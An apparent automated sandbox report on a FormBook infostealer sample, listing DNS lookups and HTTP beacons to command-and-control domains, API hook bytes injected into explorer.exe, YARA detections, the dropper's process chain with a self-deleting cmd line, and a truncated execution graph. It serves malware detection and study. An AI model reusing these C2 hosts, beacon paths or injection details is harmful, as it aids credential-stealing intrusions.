                                                                Nov 29, 2022 15:13:51.719506979 CET4970080192.168.2.3103.100.63.146
                                                                Nov 29, 2022 15:13:51.721504927 CET4970080192.168.2.3103.100.63.146
                                                                Nov 29, 2022 15:13:52.007050037 CET8049700103.100.63.146192.168.2.3
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 29, 2022 15:13:30.082436085 CET4997753192.168.2.38.8.8.8
                                                                Nov 29, 2022 15:13:30.123944998 CET53499778.8.8.8192.168.2.3
                                                                Nov 29, 2022 15:13:50.786351919 CET5784053192.168.2.38.8.8.8
                                                                Nov 29, 2022 15:13:51.133874893 CET53578408.8.8.8192.168.2.3
                                                                Nov 29, 2022 15:14:11.876477003 CET5799053192.168.2.38.8.8.8
                                                                Nov 29, 2022 15:14:12.086411953 CET53579908.8.8.8192.168.2.3
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 29, 2022 15:13:30.082436085 CET192.168.2.38.8.8.80x1a2aStandard query (0)www.111lll.xyzA (IP address)IN (0x0001)false
                                                                Nov 29, 2022 15:13:50.786351919 CET192.168.2.38.8.8.80xd00aStandard query (0)www.73129.vipA (IP address)IN (0x0001)false
                                                                Nov 29, 2022 15:14:11.876477003 CET192.168.2.38.8.8.80xc8d8Standard query (0)www.autonomaat.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 29, 2022 15:13:30.123944998 CET8.8.8.8192.168.2.30x1a2aNo error (0)www.111lll.xyzzksnp3mu.sktcks.comCNAME (Canonical name)IN (0x0001)false
                                                                Nov 29, 2022 15:13:30.123944998 CET8.8.8.8192.168.2.30x1a2aNo error (0)zksnp3mu.sktcks.comfbcuj92a.n.sktcks.comCNAME (Canonical name)IN (0x0001)false
                                                                Nov 29, 2022 15:13:30.123944998 CET8.8.8.8192.168.2.30x1a2aNo error (0)fbcuj92a.n.sktcks.com18.167.242.213A (IP address)IN (0x0001)false
                                                                Nov 29, 2022 15:13:30.123944998 CET8.8.8.8192.168.2.30x1a2aNo error (0)fbcuj92a.n.sktcks.com18.167.194.182A (IP address)IN (0x0001)false
                                                                Nov 29, 2022 15:13:51.133874893 CET8.8.8.8192.168.2.30xd00aNo error (0)www.73129.vip103.100.63.146A (IP address)IN (0x0001)false
                                                                Nov 29, 2022 15:14:12.086411953 CET8.8.8.8192.168.2.30xc8d8No error (0)www.autonomaat.com54.67.42.145A (IP address)IN (0x0001)false
                                                                Nov 29, 2022 15:14:12.086411953 CET8.8.8.8192.168.2.30xc8d8No error (0)www.autonomaat.com54.67.93.101A (IP address)IN (0x0001)false
                                                                Nov 29, 2022 15:14:12.086411953 CET8.8.8.8192.168.2.30xc8d8No error (0)www.autonomaat.com52.8.134.32A (IP address)IN (0x0001)false
                                                                • www.111lll.xyz
                                                                • www.73129.vip
                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.34969918.167.242.21380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Nov 29, 2022 15:13:30.348653078 CET103OUTGET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1
                                                                Host: www.111lll.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Nov 29, 2022 15:13:30.580126047 CET103INHTTP/1.1 404 Not Found
                                                                Date: Tue, 29 Nov 2022 14:13:30 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Server: Cheertech CDN
                                                                X-Cache-Status: MISS
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.349700103.100.63.14680C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Nov 29, 2022 15:13:51.421838045 CET105OUTGET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1
                                                                Host: www.73129.vip
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Nov 29, 2022 15:13:51.719268084 CET105INHTTP/1.1 302 Found
                                                                Server: nginx
                                                                Date: Tue, 29 Nov 2022 14:13:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: http://gcsahrz23.xyz/
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Code Manipulations

                                                                Function NameHook TypeActive in Processes
                                                                PeekMessageAINLINEexplorer.exe
                                                                PeekMessageWINLINEexplorer.exe
                                                                GetMessageWINLINEexplorer.exe
                                                                GetMessageAINLINEexplorer.exe
                                                                Function NameHook TypeNew Data
                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE7
                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE7
                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE7
                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE7

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:15:12:02
                                                                Start date:29/11/2022
                                                                Path:C:\Users\user\Desktop\shedfam.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\shedfam.exe
                                                                Imagebase:0x400000
                                                                File size:901270 bytes
                                                                MD5 hash:C0A85D86855B257B25572AA7D9D90381
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                Target ID:1
                                                                Start time:15:12:03
                                                                Start date:29/11/2022
                                                                Path:C:\Users\user\AppData\Local\Temp\kmhbvf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
                                                                Imagebase:0xed0000
                                                                File size:893608 bytes
                                                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 2%, ReversingLabs
                                                                Reputation:moderate

                                                                Target ID:2
                                                                Start time:15:12:03
                                                                Start date:29/11/2022
                                                                Path:C:\Users\user\AppData\Local\Temp\kmhbvf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
                                                                Imagebase:0xed0000
                                                                File size:893608 bytes
                                                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                Target ID:3
                                                                Start time:15:12:09
                                                                Start date:29/11/2022
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff69fe90000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:high

                                                                Target ID:13
                                                                Start time:15:12:51
                                                                Start date:29/11/2022
                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                Imagebase:0x120000
                                                                File size:32768 bytes
                                                                MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                Target ID:14
                                                                Start time:15:12:59
                                                                Start date:29/11/2022
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
                                                                Imagebase:0xb0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Target ID:15
                                                                Start time:15:12:59
                                                                Start date:29/11/2022
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff745070000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:15%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:22.9%
                                                                  Total number of Nodes:1272
                                                                  Total number of Limit Nodes:22
                                                                  execution_graph 3533 401cc1 GetDlgItem GetClientRect 3534 402a0c 18 API calls 3533->3534 3535 401cf1 LoadImageA SendMessageA 3534->3535 3536 4028a1 3535->3536 3537 401d0f DeleteObject 3535->3537 3537->3536 3538 401dc1 3539 402a0c 18 API calls 3538->3539 3540 401dc7 3539->3540 3541 402a0c 18 API calls 3540->3541 3542 401dd0 3541->3542 3543 402a0c 18 API calls 3542->3543 3544 401dd9 3543->3544 3545 402a0c 18 API calls 3544->3545 3546 401de2 3545->3546 3547 401423 25 API calls 3546->3547 3548 401de9 ShellExecuteA 3547->3548 3549 401e16 3548->3549 3550 401645 3551 402a0c 18 API calls 3550->3551 3552 40164c 3551->3552 3553 402a0c 18 API calls 3552->3553 3554 401655 3553->3554 3555 402a0c 18 API calls 3554->3555 3556 40165e MoveFileA 3555->3556 3557 401671 3556->3557 3558 40166a 3556->3558 3559 405ff6 2 API calls 3557->3559 3562 40217f 3557->3562 3560 401423 25 API calls 3558->3560 3561 401680 3559->3561 3560->3562 3561->3562 3563 405a49 40 API calls 3561->3563 3563->3558 3564 401ec5 3565 402a0c 18 API calls 3564->3565 3566 401ecc 3565->3566 3567 406087 5 API calls 3566->3567 3568 401edb 3567->3568 3569 401ef3 GlobalAlloc 3568->3569 3570 401f5b 3568->3570 3569->3570 3571 401f07 3569->3571 3572 406087 5 API calls 3571->3572 3573 401f0e 3572->3573 3574 406087 5 API calls 3573->3574 3575 401f18 3574->3575 3575->3570 3579 405c59 wsprintfA 3575->3579 3577 401f4f 3580 405c59 wsprintfA 3577->3580 3579->3577 3580->3570 3581 4023c5 3592 402b16 3581->3592 3583 4023cf 3584 402a0c 18 API calls 3583->3584 3585 4023d8 3584->3585 3586 4023e2 RegQueryValueExA 3585->3586 3590 402672 3585->3590 3587 402402 3586->3587 3588 402408 RegCloseKey 3586->3588 3587->3588 3596 405c59 wsprintfA 3587->3596 3588->3590 3593 402a0c 18 API calls 3592->3593 3594 402b2f 3593->3594 3595 402b3d RegOpenKeyExA 3594->3595 3595->3583 3596->3588 3597 404746 3598 404772 3597->3598 3599 404756 3597->3599 3600 4047a5 3598->3600 3601 404778 SHGetPathFromIDListA 3598->3601 3608 4055a0 GetDlgItemTextA 3599->3608 3604 40478f SendMessageA 3601->3604 3605 404788 3601->3605 3603 404763 SendMessageA 3603->3598 3604->3600 3606 40140b 2 API calls 3605->3606 3606->3604 3608->3603 3612 4040cb lstrcpynA lstrlenA 3291 40324f SetErrorMode GetVersion 3292 403285 3291->3292 3293 40328b 3291->3293 3294 406087 5 API calls 3292->3294 3295 40601d 3 API calls 3293->3295 3294->3293 3296 4032a0 3295->3296 3297 40601d 3 API calls 3296->3297 3298 4032aa 3297->3298 3299 40601d 3 API calls 3298->3299 3300 4032b4 3299->3300 3301 406087 5 API calls 3300->3301 3302 4032bb 3301->3302 3303 406087 5 API calls 3302->3303 3304 4032c2 #17 OleInitialize SHGetFileInfoA 3303->3304 3384 405cfb lstrcpynA 3304->3384 3306 4032ff GetCommandLineA 3385 405cfb lstrcpynA 3306->3385 3308 403311 GetModuleHandleA 3309 403328 3308->3309 3310 405819 CharNextA 3309->3310 3311 40333c CharNextA 3310->3311 3319 403349 3311->3319 3312 4033b2 3313 4033c5 GetTempPathA 3312->3313 3386 40321e 3313->3386 3315 4033db 3316 4033ff DeleteFileA 3315->3316 3317 4033df GetWindowsDirectoryA lstrcatA 3315->3317 3396 402c88 GetTickCount GetModuleFileNameA 3316->3396 3320 40321e 12 API calls 3317->3320 3318 405819 CharNextA 3318->3319 3319->3312 3319->3318 3323 4033b4 3319->3323 3322 4033fb 3320->3322 3322->3316 3326 40347d ExitProcess OleUninitialize 3322->3326 3483 405cfb lstrcpynA 3323->3483 3324 403410 3324->3326 3332 405819 CharNextA 3324->3332 3365 403469 3324->3365 3327 4035a1 3326->3327 3328 403492 3326->3328 3330 403644 ExitProcess 3327->3330 3336 406087 5 API calls 3327->3336 3329 4055bc MessageBoxIndirectA 3328->3329 3335 4034a0 ExitProcess 3329->3335 3334 403427 3332->3334 3340 403444 3334->3340 3341 4034a8 3334->3341 3338 4035b4 3336->3338 3339 406087 5 API calls 3338->3339 3342 4035bd 3339->3342 3344 4058cf 18 API calls 3340->3344 3486 405543 3341->3486 3345 406087 5 API calls 3342->3345 3347 40344f 3344->3347 3348 4035c6 3345->3348 3347->3326 3484 405cfb lstrcpynA 3347->3484 3351 4035e4 3348->3351 3359 4035d4 GetCurrentProcess 3348->3359 3349 4034c9 lstrcatA lstrcmpiA 3349->3326 3353 4034e5 3349->3353 3350 4034be lstrcatA 3350->3349 3352 406087 5 API calls 3351->3352 3355 40361b 3352->3355 3356 4034f1 3353->3356 3357 4034ea 3353->3357 3360 403630 ExitWindowsEx 3355->3360 3366 40363d 3355->3366 3494 405526 CreateDirectoryA 3356->3494 3489 4054a9 CreateDirectoryA 3357->3489 3358 40345e 3485 405cfb lstrcpynA 3358->3485 3359->3351 3360->3330 3360->3366 3426 40374e 3365->3426 3499 40140b 3366->3499 3367 4034f6 SetCurrentDirectoryA 3368 403510 3367->3368 3369 403505 3367->3369 3498 405cfb lstrcpynA 3368->3498 3497 405cfb lstrcpynA 3369->3497 3373 405d1d 18 API calls 3374 403540 DeleteFileA 3373->3374 3375 40354d CopyFileA 3374->3375 3381 40351e 3374->3381 3375->3381 3376 403595 3377 405a49 40 API calls 3376->3377 3379 40359c 3377->3379 3378 405a49 40 API calls 3378->3381 3379->3326 3380 405d1d 18 API calls 3380->3381 3381->3373 3381->3376 3381->3378 3381->3380 3382 40555b 2 API calls 3381->3382 3383 403581 CloseHandle 3381->3383 3382->3381 3383->3381 3384->3306 3385->3308 3387 405f5d 5 API calls 3386->3387 3389 40322a 3387->3389 3388 403234 3388->3315 3389->3388 3390 4057ee 3 API calls 3389->3390 3391 40323c 3390->3391 3392 405526 2 API calls 3391->3392 3393 403242 3392->3393 3394 405a01 2 API calls 3393->3394 3395 40324d 3394->3395 3395->3315 3502 4059d2 GetFileAttributesA CreateFileA 3396->3502 3398 402ccb 3425 402cd8 3398->3425 3503 405cfb lstrcpynA 3398->3503 3400 402cee 3401 405835 2 API calls 3400->3401 3402 402cf4 3401->3402 3504 405cfb lstrcpynA 3402->3504 3404 402cff GetFileSize 3405 402e00 3404->3405 3423 402d16 3404->3423 3406 402be9 33 API calls 3405->3406 3407 402e07 3406->3407 3410 402e43 GlobalAlloc 3407->3410 3407->3425 3506 403207 SetFilePointer 3407->3506 3408 4031d5 ReadFile 3408->3423 3409 402e9b 3412 402be9 33 API calls 3409->3412 3411 402e5a 3410->3411 3416 405a01 2 API calls 3411->3416 3412->3425 3414 402e24 3417 4031d5 ReadFile 3414->3417 3415 402be9 33 API calls 3415->3423 3418 402e6b CreateFileA 3416->3418 3419 402e2f 3417->3419 3420 402ea5 3418->3420 3418->3425 3419->3410 3419->3425 3505 403207 SetFilePointer 3420->3505 3422 402eb3 3424 402f2e 48 API calls 3422->3424 3423->3405 3423->3408 3423->3409 3423->3415 3423->3425 3424->3425 3425->3324 3427 406087 5 API calls 3426->3427 3428 403762 3427->3428 3429 403768 3428->3429 3430 40377a 3428->3430 3516 405c59 wsprintfA 3429->3516 3431 405be2 3 API calls 3430->3431 3432 40379b 3431->3432 3434 4037b9 lstrcatA 3432->3434 3436 405be2 3 API calls 3432->3436 3435 403778 3434->3435 3507 403a17 3435->3507 3436->3434 3439 4058cf 18 API calls 3440 4037eb 3439->3440 3441 403874 3440->3441 3443 405be2 3 API calls 3440->3443 3442 4058cf 18 API calls 3441->3442 3444 40387a 3442->3444 3445 403817 3443->3445 3446 40388a LoadImageA 3444->3446 3447 405d1d 18 API calls 3444->3447 3445->3441 3450 403833 lstrlenA 3445->3450 3453 405819 CharNextA 3445->3453 3448 4038b5 RegisterClassA 3446->3448 3449 40393e 3446->3449 3447->3446 3451 4038f1 SystemParametersInfoA CreateWindowExA 3448->3451 3481 403479 3448->3481 3452 40140b 2 API calls 3449->3452 3454 403841 lstrcmpiA 3450->3454 3455 403867 3450->3455 3451->3449 3456 403944 3452->3456 3457 403831 3453->3457 3454->3455 3458 403851 GetFileAttributesA 3454->3458 3459 4057ee 3 API calls 3455->3459 3461 403a17 19 API calls 3456->3461 3456->3481 3457->3450 3460 40385d 3458->3460 3462 40386d 3459->3462 3460->3455 3464 405835 2 API calls 3460->3464 3465 403955 3461->3465 3517 405cfb lstrcpynA 3462->3517 3464->3455 3466 403961 ShowWindow 3465->3466 3467 4039e4 3465->3467 3468 40601d 3 API calls 3466->3468 3518 4050b9 OleInitialize 3467->3518 3470 403979 3468->3470 3472 403987 GetClassInfoA 3470->3472 3475 40601d 3 API calls 3470->3475 3471 4039ea 3473 403a06 3471->3473 3474 4039ee 3471->3474 3477 4039b1 DialogBoxParamA 3472->3477 3478 40399b GetClassInfoA RegisterClassA 3472->3478 3476 40140b 2 API calls 3473->3476 3479 40140b 2 API calls 3474->3479 3474->3481 3475->3472 3476->3481 3480 40140b 2 API calls 3477->3480 3478->3477 3479->3481 3482 4039d9 3480->3482 3481->3326 3482->3481 3483->3313 3484->3358 3485->3365 3487 406087 5 API calls 3486->3487 3488 4034ad lstrcatA 3487->3488 3488->3349 3488->3350 3490 4034ef 3489->3490 3491 4054fa GetLastError 3489->3491 3490->3367 3491->3490 3492 405509 SetFileSecurityA 3491->3492 3492->3490 3493 40551f GetLastError 3492->3493 3493->3490 3495 405536 3494->3495 3496 40553a GetLastError 3494->3496 3495->3367 3496->3495 3497->3368 3498->3381 3500 401389 2 API calls 3499->3500 3501 401420 3500->3501 3501->3330 3502->3398 3503->3400 3504->3404 3505->3422 3506->3414 3508 403a2b 3507->3508 3525 405c59 wsprintfA 3508->3525 3510 403a9c 3511 405d1d 18 API calls 3510->3511 3512 403aa8 SetWindowTextA 3511->3512 3513 403ac4 3512->3513 3514 4037c9 3512->3514 3513->3514 3515 405d1d 18 API calls 3513->3515 3514->3439 3515->3513 3516->3435 3517->3441 3526 404003 3518->3526 3520 4050dc 3524 405103 3520->3524 3529 401389 3520->3529 3521 404003 SendMessageA 3522 405115 OleUninitialize 3521->3522 3522->3471 3524->3521 3525->3510 3527 40401b 3526->3527 3528 40400c SendMessageA 3526->3528 3527->3520 3528->3527 3531 401390 3529->3531 3530 4013fe 3530->3520 3531->3530 3532 4013cb MulDiv SendMessageA 3531->3532 3532->3531 3613 402b51 3614 402b60 SetTimer 3613->3614 3615 402b79 3613->3615 3614->3615 3616 402bc7 3615->3616 3617 402bcd MulDiv 3615->3617 3618 402b87 wsprintfA SetWindowTextA SetDlgItemTextA 3617->3618 3618->3616 3627 402654 3628 402a0c 18 API calls 3627->3628 3629 40265b FindFirstFileA 3628->3629 3630 40267e 3629->3630 3633 40266e 3629->3633 3635 405c59 wsprintfA 3630->3635 3632 402685 3636 405cfb lstrcpynA 3632->3636 3635->3632 3636->3633 3637 4024d4 3638 4024d9 3637->3638 3639 4024ea 3637->3639 3646 4029ef 3638->3646 3640 402a0c 18 API calls 3639->3640 3642 4024f1 lstrlenA 3640->3642 3644 4024e0 3642->3644 3643 402672 3644->3643 3645 402510 WriteFile 3644->3645 3645->3643 3647 405d1d 18 API calls 3646->3647 3648 402a03 3647->3648 3648->3644 3649 4014d6 3650 4029ef 18 API calls 3649->3650 3651 4014dc Sleep 3650->3651 3653 4028a1 3651->3653 3659 4018d8 3660 40190f 3659->3660 3661 402a0c 18 API calls 3660->3661 3662 401914 3661->3662 3663 405620 70 API calls 3662->3663 3664 40191d 3663->3664 3665 4018db 3666 402a0c 18 API calls 3665->3666 3667 4018e2 3666->3667 3668 4055bc MessageBoxIndirectA 3667->3668 3669 4018eb 3668->3669 3166 40365c 3167 403677 3166->3167 3168 40366d CloseHandle 3166->3168 3169 403681 CloseHandle 3167->3169 3170 40368b 3167->3170 3168->3167 3169->3170 3175 4036b9 3170->3175 3176 4036c7 3175->3176 3177 403690 3176->3177 3178 4036cc FreeLibrary GlobalFree 3176->3178 3179 405620 3177->3179 3178->3177 3178->3178 3221 4058cf 3179->3221 3182 405654 3195 405789 3182->3195 3235 405cfb lstrcpynA 3182->3235 3183 40563d DeleteFileA 3184 40369c 3183->3184 3186 40567e 3187 405682 lstrcatA 3186->3187 3188 40568f 3186->3188 3190 405695 3187->3190 3236 405835 lstrlenA 3188->3236 3189 405ff6 2 API calls 3192 4057ae 3189->3192 3193 4056a3 lstrcatA 3190->3193 3194 4056ae lstrlenA FindFirstFileA 3190->3194 3192->3184 3196 4057ee 3 API calls 3192->3196 3193->3194 3194->3195 3200 4056d2 3194->3200 3195->3184 3195->3189 3198 4057b8 3196->3198 3197 405819 CharNextA 3197->3200 3199 4059b3 2 API calls 3198->3199 3201 4057be 